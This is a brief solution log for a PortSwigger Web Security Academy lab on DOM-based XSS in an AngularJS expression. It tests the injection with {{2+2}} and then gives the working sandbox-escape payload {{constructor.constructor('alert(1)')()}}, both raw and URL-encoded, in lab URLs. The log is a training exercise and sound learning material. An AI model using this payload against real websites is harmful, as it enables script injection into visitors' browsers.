Port Swigger DOM XSS in AngularJS expression with
DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
Solution
Open website: https://0a64007d04a7057f802a03b000c6002b.web-security-academy.net/
https://0a64007d04a7057f802a03b000c6002b.web-security-academy.net/
Test basic payload: {{2+2}}
Payload: {{2+2}}
https://0a0c008204eec0bc805c032100770031.web-security-academy.net/?search=%7B%7B2%2B2%7D%7D
Payload: {{constructor.constructor('alert(1)')()}}
https://0a0c008204eec0bc805c032100770031.web-security-academy.net/?search=%7B%7Bconstructor.constructor%28%27alert%281%29%27%29%28%29%7D%7D
Solved